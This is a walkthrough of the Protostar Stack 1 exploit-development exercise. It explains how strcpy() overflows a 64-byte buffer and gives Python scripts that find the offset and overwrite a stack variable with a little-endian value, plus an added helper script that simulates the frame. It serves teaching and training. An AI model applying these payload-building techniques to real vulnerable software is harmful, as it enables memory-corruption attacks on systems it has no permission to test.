[ExpDev] Exploit Exercise | Protostar | Stack 1

Stack 1

The goal of this challenge is to overflow a stack buffer so that the “modified” variable, which the program initialises to 0, ends up holding 0x61626364, which makes the program print the winning statement.

  • modified = 0;: the “modified” variable is set to 0 right before the copy, so it can only become 0x61626364 if something writes past the buffer.
  • strcpy(buffer, argv[1]);: this is the vulnerable call. strcpy() copies the user-supplied argument into buffer until it hits a NUL byte and never checks the destination size. buffer is 64 bytes (char buffer[64];), so any argument longer than that overflows it and overwrites whatever sits next to it on the stack, in this case “modified”.

Initial Recon

When we pass a short, arbitrary string such as “bigb0ss”, the program reports the current value of “modified”, 0x00000000:

So, what is going on? Let’s look at the source code once again. After the copy, the program checks whether “modified” equals 0x61626364; if it does not, it prints the current value of “modified”, which for a short input is still 0.

Since we know the buffer is 64 bytes, let’s supply 70 “A”s and see what happens:

0x41 is the ASCII code of a capital “A”, so by supplying more bytes than the buffer holds we have overwritten “modified” with our own data. The remaining task is simple: (1) find the exact offset at which “modified” starts; (2) place 0x61626364 at that offset.

Exploit

Let’s create the following exploit with python:

[Exploit-1]
#!/usr/bin/env python
padding = "A" * 60                    # 60 bytes of filler
padding += "BBBBCCCCDDDDEEEEFFFF"     # distinct 4-byte markers so the printed value tells us the offset

print(padding)

When we run this against the stack1 program, the “modified” value is now 0x43434343 (0x43 = “C”), so “modified” starts exactly 64 bytes into our input: 60 “A”s plus “BBBB”.

Now we know that replacing “CCCC” with our target value (0x61626364) will print the winning statement. Before that, we need the target as bytes: 0x61626364 is the ASCII string “abcd”, but the Protostar VM is little-endian, so the least significant byte (0x64 = “d”) is stored first in memory and the value has to be supplied as “dcba”.

[Exploit-2]
#!/usr/bin/env python
padding = "A" * 64                    # offset: 60 "A"s + "BBBB"
padding += "dcba"                     # 0x61626364 in little-endian byte order, replacing "CCCC"

print(padding)

When it’s run, we get the winning statement!
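The two steps above (probe with distinct markers to find the offset, then pack the target in little-endian order) generalise to any value and any offset. The following script is an added example, not the original post's exploit: it derives the offset from the value the program reports, packs the target with struct so the byte order is never hand-written, refuses payloads that strcpy() would truncate at a NUL, and includes a constructed model of the stack1 frame (buffer[64] immediately followed by the 4-byte “modified”, the layout the post's 0x43434343 result implies) so the payload can be checked offline. The names offset_pattern, find_offset, build_payload and simulate_stack1 are my own.

```python
#!/usr/bin/env python3
"""Added example (not the original post's exploit): offset finding and
little-endian packing for Protostar stack1, with a constructed model of the
frame so the payload can be checked without the VM."""
import struct
import sys

BUFFER_SIZE = 64          # char buffer[64] in stack1
TARGET = 0x61626364       # value "modified" must hold to print the win message


def offset_pattern(padding=60, markers=("BBBB", "CCCC", "DDDD", "EEEE", "FFFF")):
    """Exploit-1 style probe: a run of 'A's followed by distinct 4-byte markers."""
    return b"A" * padding + "".join(markers).encode()


def find_offset(pattern, observed, endian="<"):
    """Return the index in 'pattern' of the 4 bytes the program reported in
    'modified'. The observed int is repacked in memory order (little-endian on
    the 32-bit x86 Protostar VM) so the search also works for mixed marker bytes."""
    needle = struct.pack(endian + "I", observed)
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("observed value 0x%08x is not in the pattern" % observed)
    return idx


def strcpy_safe(payload):
    """strcpy() stops at the first NUL, so the payload may not contain one."""
    return b"\x00" not in payload


def build_payload(offset, value=TARGET, endian="<"):
    """Exploit-2 style payload: filler up to the offset, then the target value
    packed in memory order (0x61626364 becomes b'dcba' on little-endian)."""
    payload = b"A" * offset + struct.pack(endian + "I", value)
    if not strcpy_safe(payload):
        raise ValueError("payload contains a NUL byte; strcpy would truncate it")
    return payload


def simulate_stack1(argv1):
    """Constructed model of the stack1 frame (assumed from the post's results):
    buffer[64] is immediately followed by the 4-byte 'modified', initially 0.
    Returns the value the program would print or compare against TARGET."""
    frame = bytearray(BUFFER_SIZE + 4)       # buffer + modified, all zero
    data = argv1.split(b"\x00", 1)[0]        # strcpy copies up to the first NUL
    frame[:len(data)] = data                 # no length check: spills into modified
    # Anything past BUFFER_SIZE + 4 would hit the saved frame pointer and return
    # address on a real stack; this model just lets the bytearray grow.
    return struct.unpack_from("<I", frame, BUFFER_SIZE)[0]


if __name__ == "__main__":
    probe = offset_pattern()
    seen = simulate_stack1(probe)            # what the "Try again" line would show
    off = find_offset(probe, seen)           # 64 for stack1
    # Emit the final payload for: ./stack1 "$(python3 exploit.py)"
    sys.stdout.buffer.write(build_payload(off))
```

Passing endian=">" to build_payload shows why the byte order matters: the same value packs to b"abcd", which on the little-endian VM would be read back as 0x64636261 and fail the comparison.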

Thanks for reading!

  • Stack 2 — Stack-based BOF: Basic 2

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security
